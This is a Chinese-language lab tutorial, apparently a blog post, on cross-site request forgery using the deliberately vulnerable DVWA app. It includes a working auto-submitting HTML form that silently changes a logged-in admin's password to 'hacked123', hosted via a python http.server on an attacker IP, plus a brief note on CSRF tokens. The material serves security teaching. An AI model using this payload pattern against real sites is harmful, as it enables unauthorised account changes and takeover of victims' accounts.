CSRF(跨站请求伪造)

🧨 什么是 CSRF?

CSRF(Cross-Site Request Forgery) 是一种攻击方式,诱导已登录的用户浏览器发送未授权请求,比如更改密码、转账等,而用户并未察觉。

攻击前提:

  1. 受害者已登录某网站,并保持登录状态(有 Cookie)。
  2. 攻击者诱导受害者访问一个恶意页面,该页面发出请求到受害者登录的站点。
  3. 服务端认为请求合法,因为带有受害者的 Cookie。

✅ DVWA 中的 CSRF 测试位置:

  1. 拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa
  2. 打开 DVWA Web 界面:http://localhost:8080,用户名:admin,密码:password
  3. 登录后,点击左侧菜单 "CSRF"。
  4. 默认功能是 修改用户密码,就是我们的测试点。

🔥 第一步:构造 CSRF 攻击页面(HTML 文件)

查看修改密码页面的前端代码:

你可以用如下代码,保存为 csrf_attack.html:

bash 复制代码
<!DOCTYPE html>
<html>
  <body>
    <h3>😈 正在发起 CSRF 攻击...</h3>
    <form action="http://localhost:8080/vulnerabilities/csrf/" method="GET">
      <input type="hidden" name="password_new" value="hacked123" />
      <input type="hidden" name="password_conf" value="hacked123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="点我也改密码" />
    </form>

    <script>
      document.forms[0].submit(); // 自动提交
    </script>
  </body>
</html>

🔄 第二步:启动一个 HTTP 服务器(攻击服务器)

假设你用攻击者机器,运行:

bash 复制代码
python3 -m http.server 8082

然后在浏览器打开:

bash 复制代码
http://<攻击者IP>:8082/csrf_attack.html

如果你已登录 DVWA,访问该页面就会修改你的密码。

输入网址后回车结果:

✅ 第三步:验证密码是否被改了

回到 DVWA,尝试用新密码登录:

  • 用户名:admin
  • 密码:hacked123

🧱 防御思路(了解):

DVWA 高安全等级下会引入 CSRF Token 防护机制,攻击者无法伪造。

相关推荐
介一安全3 天前
【Web安全】CRLF注入攻击深度解析:原理、场景与安全测试防御指南
安全·web安全·网络安全·代码审计·安全性测试
介一安全7 天前
AI 暗战: 回声室攻击 —— 解锁大模型安全防御的隐秘战场
人工智能·安全·ai·安全性测试
阿龟在奔跑7 天前
Spring Security 传统 web 开发场景下开启 CSRF 防御原理与源码解析
java·spring·web安全·java-ee·csrf
TwoAI9 天前
信息搜集工具篇、rustscan
安全性测试
卓码软件测评15 天前
软件测试:如何利用Burp Suite进行高效WEB安全测试
网络·安全·web安全·可用性测试·安全性测试
卓码软件测评16 天前
【网站测试:CORS配置错误引发的安全风险及测试】
功能测试·安全·web安全·压力测试·可用性测试·安全性测试
成成成成成成果1 个月前
电商支付异常测试全攻略
功能测试·测试工具·集成测试·模块测试·测试覆盖率·安全性测试·testlink
介一安全1 个月前
【BurpSuite 插件开发】实战篇(六)实现自定义请求头的修改与请求测试
web安全·安全性测试·burpsuite·安全工具·burp 开发
xyphf_和派孔明1 个月前
关于Web前端安全防御CSRF攻防的几点考虑
前端·安全·csrf
卓码软件测评1 个月前
软件测试测评公司关于HTTP安全头配置与测试?
web安全·网络安全·安全性测试·web app